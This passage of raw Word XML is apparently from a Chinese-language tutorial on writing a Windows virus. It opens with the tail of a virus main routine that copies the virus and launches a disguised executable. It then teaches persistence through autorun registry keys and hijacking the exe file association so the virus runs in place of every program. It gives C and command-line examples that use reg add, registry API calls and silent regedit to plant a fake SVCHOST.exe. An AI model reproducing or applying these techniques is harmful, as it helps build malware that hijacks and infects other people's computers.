    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if (argc &gt; 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if (strcmp(argv[1], "/s") == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>goto next1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>autorun_explorer();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>spawnl(1, "c:\\windows\\system\\explorer.exe", NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>next1: add_reg();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>copy_virus();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>make_rubbish();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/* remove_files(); */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>spawnl(1, "c:\\windows\\system32\\mstsc32.exe", " /s", NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94676" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="00A94676" w:rsidP="00A94676">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2751" w:rsidRDefault="009F2751" w:rsidP="009F2751"/>
    <w:p w:rsidR="009F2751" w:rsidRPr="009F2751" w:rsidRDefault="009F2751" w:rsidP="009F2751"/>
    <w:p w:rsidR="002B555A" w:rsidRDefault="002B555A" w:rsidP="004C3266">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:t>修改注册表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401B20" w:rsidRDefault="00560F6F" w:rsidP="005D33C3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00AC3196">
        <w:t>可以用于病毒开机自启动的注册表位置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401B20" w:rsidRDefault="00AC3196" w:rsidP="00401B20">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D33C3">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>[HKLM\SOFTWARE\Micros</w:t>
      </w:r>
      <w:r w:rsidR="00401B20">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>oft\Windows\CurrentVersion\Run]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401B20" w:rsidRDefault="00AC3196" w:rsidP="00401B20">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D33C3">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>[HKLM\SOFTWARE\Microsoft\Wind</w:t>
      </w:r>
      <w:r w:rsidR="00401B20">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>ows\CurrentVersion\RunServices]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401B20" w:rsidRDefault="00AC3196" w:rsidP="00401B20">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D33C3">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>[HKLM\SOFTWARE\Microsoft\</w:t>
      </w:r>
      <w:r w:rsidR="00401B20">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>Windows\CurrentVersion\RunOnce]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401B20" w:rsidRDefault="00AC3196" w:rsidP="00401B20">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D33C3">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>[HKLM\SOFTWARE\Microsoft\Windows\</w:t>
      </w:r>
      <w:r w:rsidR="00401B20">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>CurrentVersion\RunServicesOnce]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401B20" w:rsidRDefault="00AC3196" w:rsidP="00401B20">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D33C3">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>[HKCU\SOFTWARE\Microsoft\Windows\Curren</w:t>
      </w:r>
      <w:r w:rsidR="00401B20">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>tVersion\Run]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401B20" w:rsidRDefault="00AC3196" w:rsidP="00401B20">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D33C3">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>[HKCU\SOFTWARE\Microsoft\</w:t>
      </w:r>
      <w:r w:rsidR="00401B20">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>Windows\CurrentVersion\RunOnce]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D33C3" w:rsidRDefault="00AC3196" w:rsidP="00401B20">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="005D33C3">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D33C3" w:rsidRDefault="00AC3196" w:rsidP="00DE54D1">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="005D33C3">
        <w:t>以上只是默认运行的部分注册表位置，其实还可以在系统启动外客(shell explorer.exe)</w:t>
      </w:r>
      <w:r w:rsidR="005D33C3">
        <w:t>后添加病毒路径等方法，同样可以实现通过注册表开机自动运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2251" w:rsidRDefault="00560F6F" w:rsidP="008C2251">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.2 </w:t>
      </w:r>
      <w:r w:rsidR="00AC3196">
        <w:t>关联文件类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE54D1" w:rsidRDefault="00AC3196" w:rsidP="00DE54D1">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>在注册表HKEY_CLASS_ROOT下可以更改文件类型的默认启动程序，比如更改EXE文件的启动程序为你写的病毒，那么每当运行exe程序时，病毒将替代程序运行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D33C3" w:rsidRDefault="00AC3196" w:rsidP="00DE54D1">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="00DE54D1">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>到注册表HKEY_CLASS_ROOT\exefile\shell\open\command下，修改“默认”修改为c:\windows\svchost.exe "%1" %*，那么以后运行.exe文件时只会运行c:\windows\svchost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2251" w:rsidRDefault="00560F6F" w:rsidP="008C2251">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00AC3196">
        <w:t>程序修改注册表的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2251" w:rsidRDefault="00AC3196" w:rsidP="005D33C3">
      <w:r>
        <w:t>(1)使用REG命令添加修改注册表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D45119" w:rsidRDefault="00AC3196" w:rsidP="00D45119">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="zhengwensuojinChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D45119">
        <w:rPr>
          <w:rStyle w:val="zhengwensuojinChar"/>
        </w:rPr>
        <w:t>REG命令使用方法具体可以在命令提示符中输入REG /?和通过参阅Windows命令帮助查看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D45119" w:rsidRDefault="00AC3196" w:rsidP="00D45119">
      <w:r w:rsidRPr="00D45119">
        <w:rPr>
          <w:rStyle w:val="zhengwensuojinChar"/>
        </w:rPr>
        <w:t>主要格式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4515" w:rsidRDefault="00AC3196" w:rsidP="00BF4515">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>REG Operation [Parameter List] Operation</w:t>
      </w:r>
      <w:r w:rsidR="00D45119">
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>QUERY|</w:t>
      </w:r>
      <w:r w:rsidR="00D45119">
        <w:t>ADD|DELETE|COPY|</w:t>
      </w:r>
      <w:r>
        <w:t>SAVE|</w:t>
      </w:r>
      <w:r w:rsidR="00D45119">
        <w:t>LOAD|UNLOAD|RESTORE|COMPARE|EXPORT|</w:t>
      </w:r>
      <w:r w:rsidR="00BF4515">
        <w:t>IMPORT ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="00D45119">
      <w:r>
        <w:t>例：向HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加名为SVCHOST的键值，键值内容为C:\Windows\system\SVCHOST.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="00DE54D1">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SVCHOST /d C:\Windows\system\SVCHOST.exe /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="00DE54D1">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>调用reg命令的方法主要有两中，一种是使用C语言中的system函数，另一种是使用C语言中的spawn类函数（如函数spawnl）。具体system和spawnl使用方法请参见其它资料,这里仅举一例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="00DE54D1">
      <w:pPr>
        <w:pStyle w:val="zhengwensuojin"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>例：用system函数通过reg命令向HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加名为SVCHOST的键值，键值内容为C:\Windows\system\SVCHOST.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2251" w:rsidRDefault="00D50A1E" w:rsidP="00924041">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>system("reg add</w:t>
      </w:r>
      <w:r w:rsidR="00AC3196">
        <w:t>\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C2251" w:rsidRDefault="00AC3196" w:rsidP="008C2251">
      <w:r>
        <w:t>(2)使用WindowsAPI添加修改注册表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00AC3196" w:rsidP="00877283">
      <w:r>
        <w:t>WindowsAPI为我们提供了大约25个函数。他提供了对注册表的读取，写入，删除，以及打开注册表及键值时所有函数这些函数有：</w:t>
      </w:r>
      <w:r w:rsidR="00877283">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00877283" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:sectPr w:rsidR="00877283" w:rsidSect="00C04F9C">
          <w:type w:val="continuous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lastRenderedPageBreak/>
        <w:t>RegCloseKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00877283" w:rsidP="00C04F9C">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:ind w:left="2" w:hangingChars="1" w:hanging="2"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>RegConnectRegistry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00AC3196" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>Reg</w:t>
      </w:r>
      <w:r w:rsidR="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>CreateKey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t>RegCreateKeyEx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t>RegDeleteKey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t>RegDeleteVale   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t>RegEnumKey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t>RegFlushKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00AC3196" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>RegGetKeySecurity(Windows9X</w:t>
      </w:r>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>不适用</w:t>
      </w:r>
      <w:r w:rsidR="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>)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lastRenderedPageBreak/>
        <w:t>RegLoadKey </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00AC3196" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>RegNotifyChangeKeyValue(Windows9X</w:t>
      </w:r>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>不适用</w:t>
      </w:r>
      <w:r w:rsidR="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>)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t>RegOpenKey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t>RegOpenKeyEx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t>RegQueryInfoKey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t>RegQueryValue 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t>RegQueryValueEx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t>RegReplaceKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00AC3196" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>RegRestoreKey(Windows9X</w:t>
      </w:r>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>不适用</w:t>
      </w:r>
      <w:r w:rsidR="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>)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lastRenderedPageBreak/>
        <w:t>RegSaveKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00AC3196" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>RegSetKeySecurity(Windows9X</w:t>
      </w:r>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>不适用</w:t>
      </w:r>
      <w:r w:rsidR="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>)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t>RegSetValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00877283" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RegSetValueEx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00AC3196" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r w:rsidRPr="00877283">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>RegUnLoadKey </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877283" w:rsidRDefault="00877283" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="0"/>
        <w:sectPr w:rsidR="00877283" w:rsidSect="00307F13">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="991" w:bottom="1440" w:left="993" w:header="851" w:footer="992" w:gutter="0"/>
          <w:cols w:num="2" w:sep="1" w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="00877283">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>等，函数的使用需要在32位C编译器下调用windows.h文件，同(1)中一样，具体函数的使用方法请参见其它资料,这里仅举一例.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>例:通过WindowsAPI向HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加名为SVCHOST的键值，键值内容为C:\Windows\system\SVCHOST.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009800D2" w:rsidRDefault="009800D2" w:rsidP="009800D2">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>TRegistry* Registry; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009800D2" w:rsidRDefault="009800D2" w:rsidP="009800D2">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>Registry=new TRegistry();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009800D2" w:rsidRDefault="00AC3196" w:rsidP="009800D2">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>Regist</w:t>
      </w:r>
      <w:r w:rsidR="009800D2">
        <w:t>ry-&gt;RootKey=HKEY_LOCAL_MACHINE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009800D2" w:rsidRDefault="00AC3196" w:rsidP="009800D2">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>Registry-&gt;OpenKey("SOFTWARE\\Microsoft\\Window</w:t>
      </w:r>
      <w:r w:rsidR="009800D2">
        <w:t>s\\CurrentVersion\\Run",FALSE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009800D2" w:rsidRDefault="00AC3196" w:rsidP="009800D2">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>Registry-&gt;WriteString("SVCHOST","C:\\Windows\\system\\SVCHOST.exe")</w:t>
      </w:r>
      <w:r w:rsidR="009800D2">
        <w:t>;WriteString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="009800D2">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
      </w:pPr>
      <w:r>
        <w:t>Registry-&gt;CloseKey();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5CCA" w:rsidRDefault="004D5CCA" w:rsidP="004D5CCA">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="004D5CCA">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>(3)使用REGEDIT添加修改注册表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>REGEDIT就是注册表编辑器，但它其实有一个/s的参数，只要调用regedit /s 注册表文件，就可以在后台无提示的修改注册表。同样需要用spawnl函数调用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3196" w:rsidRDefault="00AC3196" w:rsidP="00891590">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>例：通过spawnl函数调用regedit向HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加名为wjview32的键值，键值内容为C:\windows\wjview32.com /s</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891590" w:rsidRPr="00891590" w:rsidRDefault="00891590" w:rsidP="00A66860">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891590">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>char *regadd={"REGEDIT4\n\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32\"=\"C:\\\\windows\\\\wjview32.com /s\""};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891590" w:rsidRPr="00891590" w:rsidRDefault="00891590" w:rsidP="00A66860">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891590">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>FILE *output;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891590" w:rsidRPr="00891590" w:rsidRDefault="00891590" w:rsidP="00A66860">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891590">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>if((output=fopen("$$$$$","w"))!=NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891590" w:rsidRPr="00891590" w:rsidRDefault="00891590" w:rsidP="00A66860">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891590">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891590" w:rsidRPr="00891590" w:rsidRDefault="00891590" w:rsidP="00A66860">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891590">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   fprintf(output,regadd);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891590" w:rsidRPr="00891590" w:rsidRDefault="00891590" w:rsidP="00A66860">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891590">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   fclose(output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891590" w:rsidRPr="00891590" w:rsidRDefault="00891590" w:rsidP="00A66860">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891590">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891590" w:rsidRDefault="00891590" w:rsidP="00A66860">
      <w:pPr>
        <w:pStyle w:val="sourcecode"/>
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891590">
        <w:rPr>
          <w:rStyle w:val="sourcecodeChar"/>
